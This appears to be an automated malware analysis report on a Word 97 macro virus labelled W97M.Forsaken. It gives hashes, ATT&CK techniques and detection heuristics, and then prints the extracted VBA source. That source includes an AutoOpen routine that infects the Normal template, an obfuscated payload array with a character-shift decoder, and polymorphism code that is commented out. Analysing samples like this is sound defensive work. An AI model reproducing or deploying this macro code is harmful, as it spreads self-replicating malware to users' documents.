Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d469c83cf2306be3…

MALICIOUS

Office (OLE)

Size: 68.0 KB | Created: 1999-05-27 08:15:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: 64edc1f411fbd145505dabbe86f4732b
SHA-1: daf77f3f642dc9f9132879d9fd348ced58839c39
SHA-256: d469c83cf2306be3041d35e0ccf1455c66edd56a0dcb8c84906cda076a7e8b6c
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically an AutoOpen macro, which is a common technique for executing malicious code upon opening. The script is obfuscated but appears to be designed to drop and execute a payload. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further support its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Noswan-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Noswan-1
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source) | Size: 15980 bytes
SHA-256: 90c0a8568c26a0a678f482314770c92510e0ab31879d6bf44e82e681dddcb9ae
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ForsakenRun()
Forsaken
End Sub




Attribute VB_Name = "Idee"
    ' =========================
    '  W97M.Forsaken ][
    '
    '  Undetectable by F/Win32
    '  Hides code in arrays
    '  PolyMorphicEngine SPE
    ' =========================

Public CodeContainer As Object
Public Runner As Object
Sub AutoOpen()
'On Error Resume Next
If MacroContainer = NormalTemplate Then
Set CodeContainer = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set Runner = Normal.ThisDocument
Else
Set CodeContainer = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set Runner = Project.ThisDocument
End If
'CodeContainer.AddFromString ("Sub ForsakenRun()" & vbCr & "Forsaken" & vbCr & "End Sub")
Drop
End Sub
Sub Drop()
'On Error Resume Next
Dim V$(40)

V$(1) = "p’ =cŒ��~ˆ‚‹EF"
V$(2) = "l‹=b��Œ�=o‚�’Š‚=k‚•‘"
V$(3) = "l�‘†Œ‹�Ks†�’�m�Œ‘‚€‘†Œ‹=Z=c~‰�‚"
V$(4) = "l�‘†Œ‹�Kp~“‚kŒ�Š~‰m�ŒŠ�‘=Z=c~‰�‚"
V$(5) = "l�‘†Œ‹�K^‰‰Œ”c~�‘p~“‚=Z=c~‰�‚"
V$(6) = "^��‰†€~‘†Œ‹Ka†��‰~–^‰‚�‘�=Z=”�^‰‚�‘�kŒ‹‚"
V$(7) = "`ŒŠŠ~‹�_~��E?s†‚”?FK`Œ‹‘�Œ‰�E?p–Š Œ‰‰‚†�‘‚‹?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(8) = "`ŒŠŠ~‹�_~��E?cŒ�Š~‘?FK`Œ‹‘�Œ‰�E?cŒ�Š~‘“Œ�‰~„‚KKK?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(9) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?j~ˆ�Œ?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(10) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?sŒ�‰~„‚‹=’‹�=^��Jf‹�KKK?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(11) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?^‹�~��‚‹KKK?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(12) = "p‚‘=^€=Z=^€‘†“‚aŒ€’Š‚‹‘Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�"
V$(13) = "p‚‘=kŒ=Z=kŒ�Š~‰q‚Š�‰~‘‚Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�"
V$(14) = "^€j=Z=`…�ETPF=H=`…�ENMMF=H=`…�ENMNF=H=`…�ENMNF"
V$(15) = "a~‘~=Z=?€Wy”†‹K�–�?"
V$(16) = "^��‰†€~‘†Œ‹Ks_bK^€‘†“‚s_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�E^€jFKb•�Œ�‘=a~‘~"
V$(17) = "^€f‹�=Z=c~‰�‚"
V$(18) = "kŒf‹�=Z=c~‰�‚"
V$(19) = "cŒ�=†=Z=N=qŒ=kŒK`Œ’‹‘"
V$(20) = "fƒ=kŒE†FKk~Š‚=Z=^€j=q…‚‹=kŒf‹�=Z=q�’‚"
V$(21) = "k‚•‘"
V$(22) = "cŒ�=†=Z=N=qŒ=^€K`Œ’‹‘"
V$(23) = "fƒ=^€E†FKk~Š‚=Z=^€j=q…‚‹=^€f‹�=Z=q�’‚"
V$(24) = "k‚•‘"
V$(25) = "fƒ=kŒf‹�=Z=c~‰�‚=q…‚‹"
V$(26) = "kŒKfŠ�Œ�‘=a~‘~"
V$(27) = "b‹�=fƒ"
V$(28) = "fƒ=^€f‹�=Z=c~‰�‚=q…‚‹"
V$(29) = "^€KfŠ�Œ�‘=a~‘~"
V$(30) = "b‹�=fƒ"
V$(31) = "fƒ=a~–EkŒ”EFF=Z=f‹‘Eo‹�=G=PMF=H=N=q…‚‹"
V$(32) = "====t†‘…=^��†�‘~‹‘Kk‚”_~‰‰ŒŒ‹"
V$(33) = "========K^‹†Š~‘†Œ‹=Z=Š�Œ^‹†Š~‘†Œ‹d‚‘^�‘�–"
V$(34) = "========Ke‚~�†‹„=Z=?tVTjKcŒ��~ˆ‚‹=™= –=g~€ˆ=q”Œƒ‰Œ”‚�Li—Œ=s•?"
V$(35) = "========Kf€Œ‹=Z=Š�Œf€Œ‹^‰‚�‘"
V$(36) = "========Kq‚•‘=Z=?fƒ=–Œ’=�‚~�=‘…†�I=–Œ’=~�‚=†‹ƒ‚€‘‚�>?"
V$(37) = "========Kp…Œ”"
V$(38) = "====b‹�=t†‘…"
V$(39) = "b‹�=fƒ"
V$(40) = "b‹�=p’ "

Application.ScreenUpdating = False

For i = 1 To 40
    
    For j = 1 To Len(V$(i))
        y = Asc(Mid$(V$(i), j, 1))
        z = y - 29
        If z < 0 Then z = z + 255
     
        x$ = x$ & Chr(c)
    Next j
    x$ = x$ & vbCr
Next

xl = CodeContainer.CountOfLines

CodeContainer.InsertLines (xl + 1), x$

If Runner = Normal.ThisDocument Then
NormalTemplate.Save
Else
ActiveDocument.SaveAs ActiveDocument.FullName
End If

'Runner.ForsakenRun

'xl = CodeContainer.CountOfLines

'For i = 1 To xl
'CodeContainer.Deletelines 1
'Next

'PolySize = Int(Rnd * 10)

'For PolyMorphic = 1 To PolySize

    'PolyString = ""
    'PolyLines = Application.VBE.ActiveVBProject.VBComponents("Idee").CodeModule.CountOfLines

    'RndLine = Int(Rnd * PolyLines)
    'StringSize = Int(Rnd * 39) + 1

    'For SomeString = 1 To StringSize
    '    PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
    'Next SomeString
    
    'Application.VBE.ActiveVBProject.VBComponents("Idee").CodeModule.InsertLines RndLine, "Rem " & PolyString

'Next PolyMorphic

If ActiveDocument.Saved = False Then _
ActiveDocument.SaveAs ActiveDocument.FullName
Application.ScreenUpdating = True
End Sub
' Jack Twoflower/LineZerØ Vx Team

' Thanks to:
' ==========
' Night
... (truncated)